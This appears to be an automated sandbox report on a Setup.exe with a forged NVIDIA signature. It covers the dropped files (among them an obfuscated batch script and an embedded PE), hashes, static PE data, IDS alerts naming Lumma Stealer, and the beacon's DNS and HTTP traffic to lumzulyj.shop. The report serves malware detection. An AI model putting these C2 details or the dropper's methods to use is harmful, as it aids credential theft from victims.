Preview:	}.../.j4+.!u..6.l.B..M..n.H.vc....5.i..O..P.....@.Ky..b.M...6.f..B6m .I..o.\D....>...5.a.:.....~1.. ..\....~.R.b.O..r...e......`..?....U.+..6..m..t8&.l..<......1..hq>..\BI\|...U..\|5....#..,#ME-..u^6........7.e...X[.Q.g4..n..ywr0.LP..h..t^.N..@...\|..b.X.....0.V.5{s/.P.....W/.....?..1........gx...J.f...#Q...]..'P......yA.g...........1z...rN>..+..G...G..._.\|f..t...).x.w..e<fr+5]...A....2..#O..u..cl....o>W.;>..........Q...j]#....Q.g.V.m...?.Y....b.X.....&^.^/r...XZ.#.O#..,...R....q..cj=....!r\1..\|.2....q.S....".A5:..V.Hp..~....}.C.7.hc......AA=x...&.........(..qE...N.iH.+.yg.mB._.."uD...3......]U2r..^..u>J0....Z....Z......,..... ..z..'.Y....##..p...':.x.......C~...G*..ksR.j#t.....}(.../c.'f...Vq...W..n.Y..)...F...o..@.u..n.......E.k.J~......!..g(.RX....(...Ag.%L......U.'U.n.cPF.X..m.S.....<....S.J..."9.....bl.G...a......L..T0_....;-7..].Y-.a..].~\|.E.L...`.......Y.Qu...bRt..U.......t.^..Q<./.Wj3.....S.kV......5.......0.i...F...37..Ent.3....

C:\Users\user\AppData\Local\Temp\Diy

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	370688
Entropy (8bit):	6.18891676515196
Encrypted:	false
SSDEEP:	6144:N/xcq21R1p/rAOPOei7TdFW6wgarnYNhBZ2BV8joj8:NZa31troPTdFqgaAV2M0w
MD5:	4EAF9E43CEEE6A50A7D0239326AB0FB1
SHA1:	BCCCDC304DE1B1AEFB3B5AC0277587DCBC2AB956
SHA-256:	16FA28C967471B56ACD38E33762FBAC6DE305243A452D1288573C1E3BF89F76D
SHA-512:	010E8B498E8E10A363E66B728C96321EBD36223ABBA2130D86F113CBE3E294648E1CDB476BE0C7CA907B333541F6160F7D3DC5F5FB29271AE6BBA6034FAC9C8D
Malicious:	false
Preview:	[..]...U..E.W...p.P.......u&V.u.....U...&.3.@j..F.P...H....,y..^.CQ.E..E.....P...H....<...j.............9......O..@........M.P..Y..3._]...U..Q.E.SVW.p...P......u'.u....GU..3.@3.S.F...P...H....x.......E.3.P..,....]..U..H..Y..u..u.....U..3.@.8].tY.u.Sh........I...H....E.QP...E......H....m...S............k......O..@.........M.P..Y......Sh....H....}..._^3.[..]...U...u..u.j.j../...]...U...u..u.j.j......]...U..V.u....u.j.j.........N..@....[....x..u+j....................N..@....3....M.P..X..3.^]...U..V.u....u.j.j........N..@.........x..u+j.............o......N..@.........M.P.#X..3.^]...U..E..u..p.Pj......]...U..E.V.u....p.Pj........N..@........x..u+j....................N..@....a....M.P.W..3.^]...U..SVW.}...........v..G..H..tU.........@.G....bU......\....u(P..<.I.P...H....Kv...u.....R...&..F....._^3.[]...U...`SV.M..M.W.....3..E.....j<Q.E..M.P.M...4...].....}....r3.G..p.....Q...F.3..f9.t..G..p.....Q...F.....G...E....r..O..q....Q...F.....G...E....r>.O..q....Q...F.3...f9

C:\Users\user\AppData\Local\Temp\Permitted

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	519168
Entropy (8bit):	6.67172163291451
Encrypted:	false
SSDEEP:	12288:rpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MQ:rT3E53Myyzl0hMQ
MD5:	A3E45144E0A0900C2795A0FDC804C35C
SHA1:	9DE65F88C50A4641C6FD7DB59B52D27D71B527D9
SHA-256:	B3EE8E496B5382CB7D65F8AF625CC8508AE52DD9E21A03B81636CD59A99F8E5F
SHA-512:	74415B81625E44DA3918F6F477D91BFEA7DF6AF39A33423E990670B113A581A82B5CA7AE60415E5DBE47AB061C4367E4EE21FF27AF4CF64B402671866A841647
Malicious:	false
Preview:	ADDITIONALLYPURCHASEDNEWLYLAUNDRYASSISTSHELPLESWRIGHT..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Populations

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	7.997437388212893
Encrypted:	true
SSDEEP:	1536:Fjl7znEbwbAioKcyioj/t/XEMzrrNJPv7iYxXzJh:9Zn/vcgB1zrrNJm8Xf
MD5:	CEC96F80134CFB767A35C25180C2B670
SHA1:	DED9F6073B57BEBC639013A097268089482187D4
SHA-256:	2B7D0A1B9F111F76EBCE4A516728E4A4D68A5259366B8AA54B329385FF8FE22B
SHA-512:	AF27524AFEEF363F9C1DC2C03220D536FD89D370F2B9180DBB98B2A421EBDFB45CF70BEB43C0CDE084BD32ADD68AC5C0A7130286053CE543DA766DC8142FB828
Malicious:	false
Preview:	..s/..5..~..bg..O7..q..we(....'....M.x\|==.....(..2rQ. E.)&..F..%.-"O....W.b..Zw.........r.;.."rME....5...".,......r..t.X.......C/..zQ.[f'x....B.+.?"0UX...!.<u....6O.}-Ov..\|.m0R.Hj.i..j.A?....w..fL.....X.N.w.......8^!&.x.a...}'I.l....7&".{W;<$L=v.]..m...e. .......:X.M....e.%..+.j...:.G.....G.F...63....(..K....+6m.K'..@(.....9.H3.Q..i......%A........m3..w..-z.....oD.8...1....Q...B.J]....K.j4...@.'...s..p!...).?D.\.....9.@...6....L..WV.8.y..T.c.....j.v.#.]....0?>.+...1...p..H..P...o%.m........B..7g.'.].6Zm.#w.}.\.......&..^.GP...E)<YjPI~..0........z"Gg.;&.x..'r\|..^.N.`....Q..%.(....-O`.R`.....t.].O.6.-.z.z...?..1..mJ....2+.s...G..A...2].&\...a....9qz......... ...$.R.!....`.Wv..X.d.y..`;7..>..G~.C.....8...7JS.`1.=...1...........'...O0~.r...$..X.........^F/m.Lc..2m............uq'.S.N9".er..^..p.r{.....).7...c-.z..r....Y%?I.2.?.@W.....vmy..j{p.s..v.-..]uy.V.Mr.Y..$e(.)PV.......V..b......,4.t..2...q...*t[.E.5.]l.HNX.<..O...K.."s.5.3..

C:\Users\user\AppData\Local\Temp\Shelter

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	7.998051087615172
Encrypted:	true
SSDEEP:	1536:a/FULw8lRlj4uLthtoCA/ch/hsTaxr2w3WAfb5EKv2Ry0KMbGkPCoBiOIw9/5sv4:IGfLDtoFgOTax0FbbDBiOIwR5MTDnvI
MD5:	F402E241CA4E9DC364B7B8C1D3EA0E41
SHA1:	D9BD3947E20D45A91863596B7FFEFBAB800D0E6E
SHA-256:	F2A1F689F0E93A0B4D0C25613029EE6E82DF16773C9B09903A6E967124C1A77A
SHA-512:	E0CABEDEEA23EAE20CD4847B3CC3EC9CC70E47C44585044ADEC67B7D356CA2032B2C5821CB7AD548DD9FD71B60C14E234E39526C58AA2B271BC2345EB6CB3464
Malicious:	false
Preview:	.kW.E...350.=....ut..;.l.&^.&.L.".,.R.s.3..c.....K.o...'C.F....:)..pU...B..(.6...)?.{Z..J.,.D..[....l.v..:Z!.Z0......k..'O8&iS]..S.e..4\`...x5.<.....}.x....j8..kQ6.1_p#,Q.)...1..D4..V...I...].L.y.....[...D0..Ha.;....f.x.....u..].9.5.)J.7)......\|.0...6_%.@.0..U.A.-F....b....(.LV.q..,....7.o..8...n.\..M!c..OY$......._..\|Wq.".e..G#z....G..c.T.....j.=!...1.%.Z.)$...bR.....G..&..~....k...../../..u)...`.R.N.^F....F2..vH.._...=..9....5..%.r...Zw.c..X..^.44.q...B....r.d..&]Kk.,v....Om.....oD.q..xZ...5.....r.9}....$}9..h....3f.G%.51....m^.XF..r.%:S/t...pEAC.B'.jGm).._....wdkM.x.4&..xw..EhZ).u......a..'T.^..eR.....H\|...oJ.x...j.j...=....b.w.:>K.\|=(.v....\|.22..;..}......k.];....h........j.e..@..B:9.?....+3..U......53f$....z>..(.....r...0h....j...uu'q.n+..1....8]........([.`.P..oD..#.....7..$....Ei.&...qj.;.GVT5.vo.j.N..4....y.N..{.r......i9ob[.(...y.X.y.\|.4...O~z...0.W/..6.^[.0..H.=./C'..u..q./.....}...i~...eB.X.p4....?.Q.N7h....v.B... ~..n.

C:\Users\user\AppData\Local\Temp\Were

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	ASCII text, with very long lines (506), with CRLF line terminators
Category:	dropped
Size (bytes):	15424
Entropy (8bit):	5.144501845151196
Encrypted:	false
SSDEEP:	384:S91zn+1Y4F7sJiqqHoGuJAprLNSd2OCH8uZ3u4VRRYGI7:SLGqwqqIGwAprLNgkcuxjC7
MD5:	27DFF75EF495D5336C5CD0EE636FA89A
SHA1:	ED367AD10DF651DB7F322570D89E0E19DE43CE37
SHA-256:	C4D6F9FF80B435063A18FE5BF657297189862662B52A4D9DA026394F2AE61A1D
SHA-512:	F1957C13ED5CDB5B906279CEB7DF7EFC7589D78EE74B1D9F614B6020EDAAB9DFC957833F713CAB51249FA24C129C0D265AB2F78F025F974C9D20F4828EA19387
Malicious:	false
Preview:	Set Forwarding=Y..aXService-Ignore-Associates-Mysimon-Beer-Nirvana-Organ-Layers-Comprehensive-..oDTechnician-..yIEZTransmit-..CFCoDdr-Transferred-Opera-Shops-Chrysler-Genres-..uHNorman-Reasonably-Protocols-Analysts-Prev-Shall-..Set Relax=l..EUDGenealogy-Gaming-Generated-Chronicle-Mercy-Signed-Sie-Lightning-..GYdSandy-Asbestos-Subscriptions-Pk-Welding-Ata-..NWRebecca-Crystal-Positioning-Subtle-Plots-Obtain-Mainstream-..MchZip-Inspired-..hruADanish-..FVYFw-Randy-Nothing-..Set Motor=q..mOHCanvas-Second-..ScyEQualified-Starsmerchant-Pmid-..kikMBride-Node-Shore-Bw-..xjsLikes-Li-..vCZSans-Tolerance-Virtually-..KtFires-Hartford-Admitted-Options-Pass-Sk-Works-Treasure-Separately-..izpQPop-..nAjAutomation-Mv-Downloaded-Elder-Political-Occurrence-..jhIAlbums-Priorities-Internationally-Queue-Imaging-Rh-Newsletter-..Set Center=5..dPArchived-No-Suzuki-Pre-..nrjNintendo-Leslie-Easier-..AccCharge-Donna-Fuzzy-Broke-..HduGates-Journalists-Cv-Powder-Operates-..rdGBroke-Hacker-Possibility-Hypothesis-Know

C:\Users\user\AppData\Local\Temp\Were.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (506), with CRLF line terminators
Category:	dropped
Size (bytes):	15424
Entropy (8bit):	5.144501845151196
Encrypted:	false
SSDEEP:	384:S91zn+1Y4F7sJiqqHoGuJAprLNSd2OCH8uZ3u4VRRYGI7:SLGqwqqIGwAprLNgkcuxjC7
MD5:	27DFF75EF495D5336C5CD0EE636FA89A
SHA1:	ED367AD10DF651DB7F322570D89E0E19DE43CE37
SHA-256:	C4D6F9FF80B435063A18FE5BF657297189862662B52A4D9DA026394F2AE61A1D
SHA-512:	F1957C13ED5CDB5B906279CEB7DF7EFC7589D78EE74B1D9F614B6020EDAAB9DFC957833F713CAB51249FA24C129C0D265AB2F78F025F974C9D20F4828EA19387
Malicious:	false
Preview:	Set Forwarding=Y..aXService-Ignore-Associates-Mysimon-Beer-Nirvana-Organ-Layers-Comprehensive-..oDTechnician-..yIEZTransmit-..CFCoDdr-Transferred-Opera-Shops-Chrysler-Genres-..uHNorman-Reasonably-Protocols-Analysts-Prev-Shall-..Set Relax=l..EUDGenealogy-Gaming-Generated-Chronicle-Mercy-Signed-Sie-Lightning-..GYdSandy-Asbestos-Subscriptions-Pk-Welding-Ata-..NWRebecca-Crystal-Positioning-Subtle-Plots-Obtain-Mainstream-..MchZip-Inspired-..hruADanish-..FVYFw-Randy-Nothing-..Set Motor=q..mOHCanvas-Second-..ScyEQualified-Starsmerchant-Pmid-..kikMBride-Node-Shore-Bw-..xjsLikes-Li-..vCZSans-Tolerance-Virtually-..KtFires-Hartford-Admitted-Options-Pass-Sk-Works-Treasure-Separately-..izpQPop-..nAjAutomation-Mv-Downloaded-Elder-Political-Occurrence-..jhIAlbums-Priorities-Internationally-Queue-Imaging-Rh-Newsletter-..Set Center=5..dPArchived-No-Suzuki-Pre-..nrjNintendo-Leslie-Easier-..AccCharge-Donna-Fuzzy-Broke-..HduGates-Journalists-Cv-Powder-Operates-..rdGBroke-Hacker-Possibility-Hypothesis-Know

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.279509871617026
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Setup.exe
File size:	73'410'092 bytes
MD5:	35874e6f90e4b9b6db01d06ddc711f2c
SHA1:	247d4310594364356cb4cc3fb1b3bb15327cdd9c
SHA256:	9c9f34c8f3fd24a4197aac078985edb782bb13dcd7d830130d8a0d41fd49b9f8
SHA512:	e1dae92b173ce0c0b55dc3ea3670a314b2b1df7fbc115e7a9a9fcfa379cd1dc4f8ec6658a499556327ff30b031afc97904b1a6cb996a87a17e6146c49876229a
SSDEEP:	24576:aCQYhkpH/kyDjPhL6H7ocaffXMdwMHXILdGucEIbs4dB1D:2YWB//pWH0TfIwM3ILfDIbPjD
TLSH:	30F702D1774D396B4ACF59AE5070766F2631D4917B26013F3A8A220DF102AA8E14E7FF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...D...B...8.....

File Icon


Icon Hash:	0ee3c3e6dcd8c2c0

Static PE Info

General

Entrypoint:	0x4038af
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	12/01/2023 19:00:00 16/01/2026 18:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007F0DE8F5BA3Bh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007F0DE8F5B71Dh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007F0DE8F5B70Bh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007F0DE8F5900Ah
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007F0DE8F5B3E1h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F0DE8F59093h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F0DE8F5900Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xac40	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x100000	0x1d3f2	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x4600004	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0x994	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x728c	0x7400	419d4e1be1ac35a5db9c47f553b27cea	False	0.6566540948275862	data	6.499708590628113	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x2b6e	0x2c00	cca1ca3fbf99570f6de9b43ce767f368	False	0.3678977272727273	data	4.497932535153822	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x72b9c	0x200	77f0839f8ebea31040e462523e1c770e	False	0.279296875	data	1.8049406284608531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x7f000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x100000	0x1d3f2	0x1d400	765705fc89038e833a240dca25bdcb60	False	0.9517978766025641	data	7.797528593261486	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11e000	0xfd6	0x1000	8246f25992ed6900a1eda8f7e5cbfcfb	False	0.598388671875	data	5.596110919440043	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x100220	0x178c6	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9904410392518713
RT_ICON	0x117ae8	0x28a6	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0010570824524312
RT_ICON	0x11a390	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.6155410903173312
RT_ICON	0x11c9f8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.7774822695035462
RT_DIALOG	0x11ce60	0x100	data	English	United States	0.5234375
RT_DIALOG	0x11cf60	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x11d07c	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x11d0dc	0x3e	Targa image data - Map 32 x 30918 x 1 +1	English	United States	0.8225806451612904
RT_MANIFEST	0x11d11c	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-08T01:38:54.544319+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49820	104.21.24.90	443	TCP
2024-12-08T01:38:56.501008+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49820	104.21.24.90	443	TCP
2024-12-08T01:38:56.501008+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49820	104.21.24.90	443	TCP
2024-12-08T01:38:56.908064+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49826	104.21.24.90	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 8, 2024 01:38:53.324717999 CET	49820	443	192.168.2.4	104.21.24.90
Dec 8, 2024 01:38:53.324748039 CET	443	49820	104.21.24.90	192.168.2.4
Dec 8, 2024 01:38:53.324824095 CET	49820	443	192.168.2.4	104.21.24.90
Dec 8, 2024 01:38:53.327904940 CET	49820	443	192.168.2.4	104.21.24.90
Dec 8, 2024 01:38:53.327915907 CET	443	49820	104.21.24.90	192.168.2.4
Dec 8, 2024 01:38:54.544225931 CET	443	49820	104.21.24.90	192.168.2.4
Dec 8, 2024 01:38:54.544318914 CET	49820	443	192.168.2.4	104.21.24.90
Dec 8, 2024 01:38:54.546111107 CET	49820	443	192.168.2.4	104.21.24.90
Dec 8, 2024 01:38:54.546123028 CET	443	49820	104.21.24.90	192.168.2.4
Dec 8, 2024 01:38:54.546350956 CET	443	49820	104.21.24.90	192.168.2.4
Dec 8, 2024 01:38:54.594621897 CET	49820	443	192.168.2.4	104.21.24.90
Dec 8, 2024 01:38:54.594639063 CET	49820	443	192.168.2.4	104.21.24.90
Dec 8, 2024 01:38:54.594748020 CET	443	49820	104.21.24.90	192.168.2.4
Dec 8, 2024 01:38:56.501013994 CET	443	49820	104.21.24.90	192.168.2.4
Dec 8, 2024 01:38:56.501096964 CET	443	49820	104.21.24.90	192.168.2.4
Dec 8, 2024 01:38:56.501173019 CET	49820	443	192.168.2.4	104.21.24.90
Dec 8, 2024 01:38:56.502964020 CET	49820	443	192.168.2.4	104.21.24.90
Dec 8, 2024 01:38:56.502979994 CET	443	49820	104.21.24.90	192.168.2.4
Dec 8, 2024 01:38:56.502990007 CET	49820	443	192.168.2.4	104.21.24.90
Dec 8, 2024 01:38:56.502996922 CET	443	49820	104.21.24.90	192.168.2.4
Dec 8, 2024 01:38:56.543698072 CET	49826	443	192.168.2.4	104.21.24.90
Dec 8, 2024 01:38:56.543730021 CET	443	49826	104.21.24.90	192.168.2.4
Dec 8, 2024 01:38:56.543817043 CET	49826	443	192.168.2.4	104.21.24.90
Dec 8, 2024 01:38:56.544091940 CET	49826	443	192.168.2.4	104.21.24.90
Dec 8, 2024 01:38:56.544102907 CET	443	49826	104.21.24.90	192.168.2.4
Dec 8, 2024 01:38:56.908063889 CET	49826	443	192.168.2.4	104.21.24.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 8, 2024 01:37:19.346024036 CET	62953	53	192.168.2.4	1.1.1.1
Dec 8, 2024 01:37:19.579225063 CET	53	62953	1.1.1.1	192.168.2.4
Dec 8, 2024 01:38:52.940166950 CET	64819	53	192.168.2.4	1.1.1.1
Dec 8, 2024 01:38:53.318696976 CET	53	64819	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 8, 2024 01:37:19.346024036 CET	192.168.2.4	1.1.1.1	0x57b3	Standard query (0)	tLlYhvSbrTRqhxpzIwTuQjRbuHJm.tLlYhvSbrTRqhxpzIwTuQjRbuHJm	A (IP address)	IN (0x0001)	false
Dec 8, 2024 01:38:52.940166950 CET	192.168.2.4	1.1.1.1	0x4af9	Standard query (0)	lumzulyj.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 8, 2024 01:37:19.579225063 CET	1.1.1.1	192.168.2.4	0x57b3	Name error (3)	tLlYhvSbrTRqhxpzIwTuQjRbuHJm.tLlYhvSbrTRqhxpzIwTuQjRbuHJm	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2024 01:38:53.318696976 CET	1.1.1.1	192.168.2.4	0x4af9	No error (0)	lumzulyj.shop		104.21.24.90	A (IP address)	IN (0x0001)	false
Dec 8, 2024 01:38:53.318696976 CET	1.1.1.1	192.168.2.4	0x4af9	No error (0)	lumzulyj.shop		172.67.218.26	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

lumzulyj.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49820	104.21.24.90	443	3452	C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Timestamp	Bytes transferred	Direction	Data
2024-12-08 00:38:54 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lumzulyj.shop
2024-12-08 00:38:54 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
